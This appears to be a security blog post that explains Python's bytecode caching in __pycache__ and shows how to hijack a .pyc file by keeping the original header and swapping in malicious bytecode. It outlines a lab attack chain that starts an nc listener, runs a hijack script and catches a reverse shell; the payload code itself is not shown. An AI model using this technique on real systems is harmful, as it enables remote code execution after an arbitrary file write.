Python Bytecode Cache Hijacking
Python Bytecode Cache Hijacking: A Deep Dive into pycache
If you've been writing Python for a while, you've probably noticed those mysterious __pycache__ folders popping up everywhere in your projects. I never really paid much attention to them until recently, when I started wondering: what exactly happens inside these folders, and more importantly, can they be exploited?
What's Actually Going On With pycache?
Let me break this down in simple terms. When you run Python code, your source files don't just get executed directly. Instead, the Python interpreter goes through several stages:
Lexing - Breaking your code into tokens
Parsing - Building an Abstract Syntax Tree (AST)
Compiling - Converting the AST into bytecode
Execution - Running the bytecode in Python's Virtual Machine
Now here's the clever part: Python doesn't want to do all this work every single time you import a module. So it caches the compiled bytecode in .pyc files inside the __pycache__ directory. This makes subsequent imports much faster since Python can skip the lexing, parsing, and compilation stages entirely.
Let's say you have a simple setup like this:
# main.py
import test
test.hello()
# test.py
def hello():
print("hello world!")When you run main.py for the first time, Python creates:
When Does Python Recompile?
Python isn't just blindly using cached files forever. It actually checks several things before deciding whether to recompile:
Has the file timestamp changed?
Has the file size changed?
Has the file hash changed?
Is the magic number different (usually from a Python version change)?
Are the compilation or optimization flags different?
If any of these checks fail, Python recompiles and overwrites the cache. But what if we could bypass these checks?
The Hijacking Experiment
Here's where things get interesting. I started wondering: what if I manually overwrote a .pyc file with my own bytecode? Would Python execute my code instead of the original?
Spoiler alert: yes, it absolutely does.
Understanding the .pyc File Format
First, I needed to understand how these bytecode files are structured. For Python 3.7 and later, the format looks like this:
The strategy here is simple: keep the magic number, timestamp, and size the same as the original file so Python thinks nothing has changed, but replace the bytecode with our own malicious code.
The Proof of Concept
I wrote a quick script to hijack the bytecode. The key steps were:
Read the original
.pycfile's header (magic, flags, timestamp)Compile my own sneaky code
Write a new
.pycfile with the original header but my bytecode
Here's what I compiled as the payload:
And here's what happened:
Before hijacking:
After hijacking:
Our malicious code executed! Instead of printing "hello world!", it ran the id command and showed my system user information.
Real-World Application: Weaponizing the Bytecode Cache
So what does this look like in a real penetration test? In web security, there's a vulnerability called "Arbitrary File Write" (AFW) where attackers can create or overwrite files on a server. While PHP folks abuse .htaccess files for RCE, Python applications have their own attack vectors.
Here's a real hijack script I used in a lab environment. This one deploys a reverse shell instead of just running id:
The attack flow is straightforward:
Set up a listener:
nc -lvnp portRun the hijack script:
python hijack.py __pycache__/cache.pycTrigger the module import in a new process
Catch the reverse shell
The beauty of this technique is that it works even in restricted environments where you can't write .py files directly or execute arbitrary commands. As long as you can overwrite a .pyc file and trigger a module import in a fresh process, you're in.
Conclusion
What started as curiosity about those __pycache__ folders turned into a fascinating journey through Python's import system and some serious security implications. The bytecode cache, designed for performance optimization, becomes a powerful attack vector when combined with arbitrary file write vulnerabilities.
Remember, this technique works because Python trusts its own cache it checks the header metadata but assumes the bytecode itself is legitimate. By preserving the original magic number, flags, and timestamp, we can slip malicious code right past Python's validation checks.
See ya tomorrow, Byte Byte!
Last updated